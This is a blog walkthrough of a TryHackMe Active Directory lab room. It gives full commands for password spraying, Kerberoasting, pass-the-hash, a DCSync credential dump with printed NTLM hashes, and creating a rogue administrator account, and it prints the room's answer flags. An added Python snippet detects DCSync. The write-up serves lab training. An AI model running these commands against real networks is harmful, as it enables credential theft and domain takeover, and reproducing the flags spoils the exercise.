
Soupedecode01 TryHackMe Walkthrough

Aug 8, 2025

TL;DR walkthrough of the Soupedecode 01 TryHackMe room.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

After a rather annoying experience taking TryHackMe’s PT1 exam, luckily for free, I wanted to do a room that has nothing to do with webapps. This room was perfect for it and included a few new tricks I will add to my AD cheatsheet such as enumerating domain accounts while only having access as the Guest user with no password.

The room also included old classics like Kerberoasting, poking around share drives looking for interesting info, password spraying, hash spraying, and PTH via smbclient, wmiexec, smbexec, evil-winrm, xfreerdp, etc. It’s always good to get reps in with those tools.

On an admin note, you may notice the IP used changing throughout the commands in this walkthrough. This is due to restarting the target VM on TryHackMe. I didn’t use any reverse shells in this room; all IPs shown are the target VM.

Enumeration

I started with an nmap scan, as I almost always do.

sudo nmap -sCV -O 10.201.48.23

Great, we know a couple things immediately:

  • The VM is a DC
  • It’s running the domain soupedecode.local
  • The VM’s FQDN is DC01.soupedecode.local
  • The VM is not running a webapp

The last point is important because CTFy VMs often run a website that you are supposed to poke around and find usernames. Either the robots.txt file will have a hint, you’re meant to run gobuster and find a dir that contains info, or they’ll simply have a “our valued employees” page with first and last names that you are meant to get usernames from.

This is common enough that I wrote a function to generate possible usernames. The last time I used it was in the K2 room.

# Input a text file with "First Last" names and generate potential usernames
# $Names = Get-Content ".\Names.txt"
Set-Location ".\CompTIA studying\THM stuff\K2"
$Names = @("James Bold", "Rose Bud")
$FQDN = "@k2.thm"
# Always include the built-in accounts
"administrator" + "$FQDN" | Out-File .\Brute.txt -Append
"guest" + "$FQDN" | Out-File .\Brute.txt -Append

ForEach($Name in $Names)
{
    # Split "First Last" on the space
    $FirstName = $Name.Split(' ')[0]
    $LastName = $Name.Split(' ')[1]
    $FirstInitial = $FirstName.Substring(0,1)
    $LastInitial = $LastName.Substring(0,1)
    # Truncated surnames for the "jamesbo" / "jamesb" style formats
    $MangledLast = $LastName.Substring(0,2)
    $MangledLast2 = $LastName.Substring(0,1)

    "$FirstName.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstName$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstName-$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstInitial$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstInitial-$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstInitial.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstName$MangledLast" + "$FQDN" | Out-File .\Brute.txt -Append
    "$FirstName$MangledLast2" + "$FQDN" | Out-File .\Brute.txt -Append
}

$Results = (Get-Content .\Brute.txt).Length
Write-Host "Mishka generated $Results usernames."
Write-Host "Copy/paste the contents of Brute.txt to /home/kali/Downloads/Wordlists/Brute and kerbrute."

In this case though we are meant to give the Guest account a shot. This is an interesting take on setting up a room, I give the room’s author points for creativity on this one.

sudo mousepad /etc/hosts
<DC's IP> soupedecode.local

/usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/guest@10.201.48.23 >> RawNames.txt

I then parsed out just the usernames using PowerShell.

$Filename = ".\SoupeDecode\RawNames.txt"
$Output = "soupdecode_users.txt"
$Lines = Get-Content "$Filename"

ForEach($Line in $Lines)
{
    # lookupsid lines look like "500: SOUPEDECODE\Administrator (SidTypeUser)";
    # skip banner/header lines that contain no backslash
    If($Line -match '\\')
    {
        ($Line.Split('\')[1]).Split(' ')[0] | Out-File ".\$Output" -Append
    }
}

Initial access

I tried listening for a while with Responder as none of the accounts were ASREPRoastable. I didn’t get any hits though. Apparently we are supposed to try password spraying. However, the room’s author didn’t give us anything to try, and rockyou.txt is a really big wordlist to try against every single account in an online attack. Hence I tried everyone’s username as their password.

/home/kali/Downloads/kerbrute_linux_amd64 passwordspray --domain soupedecode.local --dc 10.201.1.43 --user-as-pass /home/kali/Downloads/THM/soupedecode_users.txt

We get creds: ybob317 / ybob317

Lateral movement

Now that I have credentials I can try all sorts of things:

  • Authenticated enumeration with tools like enum4linux
  • Poking around share drives
  • Kerberoasting
  • BloodHound

enum4linux -u soupedecode.local\\ybob317 -p ybob317 -a 10.201.1.43

There’s a Users and a backup share. Let’s see if there’s any interesting information on them.

smbclient \\\\10.201.1.43\\Users -U soupedecode.local\\ybob317

cd ybob317\Desktop
more user.txt

28189316c25dd3c0ad56d44d000d62a8

Nice, we found the user flag.

I next tried Kerberoasting.

/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request soupedecode.local/ybob317 -dc-ip 10.201.1.43 -outputfile /home/kali/Downloads/THM/Roasted.txt
john /home/kali/Downloads/THM/Roasted.txt --format=krb5tgs --wordlist=/home/kali/rockyou.txt

John didn’t show which account had that password, so I ran a quick password spray against the 5 accounts with SPNs. I put these account names in TryThese.txt.

crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -p 'Password123!!' -d soupedecode.local

We have the password to file_svc, so let’s enumerate shares again.

smbclient \\\\10.201.1.43\\backup -U soupedecode.local\\file_svc

ls
more backup_extract.txt

I parsed out the hashes using Get-RawHashes.ps1.

# Input a secretsdump file and output just the NTLM hashes
# secretsdump lines look like "user:rid:lmhash:nthash:::", so field 3 is the NT hash
$Lines = Get-Content ".\backup_extract.txt"

ForEach($Line in $Lines)
{
    $Fields = $Line.Split(':')
    # skip any line that isn't in the dump format
    If($Fields.Length -ge 4)
    {
        $Fields[3] | Out-File .\RawHashes.txt -Append
    }
}
(Get-Content .\RawHashes.txt).Length

I added the computer accounts, admin, and Administrator to TryThese.txt and sprayed the hashes.

crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -H /home/kali/Downloads/THM/RawHashes.txt -d soupedecode.local --continue-on-success

We got a hit.

soupedecode.local\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559

Privilege Escalation

So we have 2 user accounts and 1 computer account:

  • ybob317 \ ybob317
  • file_svc \ Password123!!
  • FileServer$ \ e41da7e79a4c76dbd9cf79d1cb325559

Let’s try poking around share drives as FileServer$. Maybe this account has access to the C drive.

smbclient //10.201.1.43/C\$ -U FileServer$ --pw-nt-hash e41da7e79a4c76dbd9cf79d1cb325559 -W soupedecode.local

Interesting, this account can read the C drive on the DC.

cd /Users/Administrator/Desktop
more root.txt

27cb2be302c388d63d27c86bfdd5f56a

Well that was rather anti-climactic. All we did was poke around share drives, we didn’t even get a shell on the DC yet.

Post compromise

I couldn’t just put the flags into TryHackMe’s site and stop there, that was almost too easy. We also never got a shell and we didn’t dump credentials. Let’s fix that.

I tried DCSyncing as FileServer$. I figured if this account had rights to read the entire C drive then they might have rights to DCSync as well.

/usr/share/doc/python3-impacket/examples/secretsdump.py 'soupedecode.local/FileServer$@10.201.1.43' -hashes :e41da7e79a4c76dbd9cf79d1cb325559 -just-dc

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
… snipped for brevity …
One of the many times the VM quit responding mid-output.

It could. I thought I might have to copy

  • C:\Windows\NTDS\ntds.dit
  • C:\Windows\System32\config\SYSTEM

and dump them offline, but there was no need.
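A matching detection for the DCSync above, as an added example that is not the walkthrough's code: a DRSUAPI replication request is audited on the DC as event 4662 carrying the replication extended-right GUIDs in its Properties field, so any account outside the domain controllers exercising them deserves an alert. The event field layout is an assumption for the example; the GUID-to-name table holds Microsoft's documented values, and only DC01$ and FileServer$ come from the room.

```python
# Added example (not from the walkthrough): spot the DCSync that secretsdump.py -just-dc
# performs. Replicating through DRSUAPI makes the DC log event 4662 on the domain object
# with the replication extended rights listed in Properties; only domain controllers (and
# a known sync service such as Entra Connect) should ever exercise those rights. The
# events below are constructed; DC01$ and FileServer$ are the room's own account names.
import re

# Extended-right GUIDs for directory replication (Microsoft-documented values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Accounts that legitimately replicate: the DCs themselves (extend with any sync service).
ALLOWED_REPLICATORS = {"dc01$"}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 events, reduced to the fields that matter for this check.
DOMAIN_DN = "DC=soupedecode,DC=local"
SAMPLE_4662 = [
    {"SubjectUserName": "DC01$", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "FileServer$", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an ordinary read of a user object: the GUID is not a replication right
    {"SubjectUserName": "ybob317", "ObjectName": "CN=ybob317,CN=Users," + DOMAIN_DN,
     "AccessMask": "0x10", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def find_dcsync(events, allowed=ALLOWED_REPLICATORS):
    """Return [(account, [rights])] for 4662 events in which an account outside the
    allow-list exercised a replication extended right."""
    findings = []
    for ev in events:
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if rights and ev["SubjectUserName"].lower() not in allowed:
            findings.append((ev["SubjectUserName"], rights))
    return findings

if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_4662):
        print(f"replication rights used by non-DC account {account}: {', '.join(rights)}")
```

Event 4662 is only written when Audit Directory Service Access is enabled on the DCs, and a computer account such as FileServer$ holding these rights is exactly the ACL review finding this room is built around.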

TryHackMe’s connection seems to just be really bad lately. I ended up using wmiexec to connect as the Administrator, added an account for Mishky, made her an Administrator, and then RDPed into the VM.

/usr/share/doc/python3-impacket/examples/wmiexec.py soupedecode.local/Administrator@10.201.72.72 -hashes aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f

net user Mishky Password123 /add
net localgroup administrators Mishky /add
xfreerdp /v:10.201.124.61 /u:Mishky /p:Password123 /dynamic-resolution

It turns out the VM is running on Windows Server 2022 Datacenter without the GUI installed. That was a nice touch by the room’s author. Altered Security was quite fond of doing this for the VMs in their CRTP Renewal Exam, but it’s something I don’t see on TryHackMe often.

Q&A

The room only had two questions:

What is the user flag?

28189316c25dd3c0ad56d44d000d62a8

What is the root flag?

27cb2be302c388d63d27c86bfdd5f56a

Summary

TryHackMe seems to be having connection issues lately. I had to run a couple commands in this room multiple times before they worked correctly, particularly those that pulled all 1,000+ accounts in the room’s domain. A few times the VM quit responding altogether until it was restarted via TryHackMe’s site. This is a big part of why the IPs change so much throughout this walkthrough.

Overall though it was a good room and IMHO had more AD in it than the PT1 exam did. It also didn’t cram a webapp into an “AD pentest”.

I also appreciated that the room’s author put everything we were meant to find on share drives and managed to make the room work without having to let Domain Users login interactively to the DC. Nice touches like that make the exercise more realistic and less CTFy.


Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
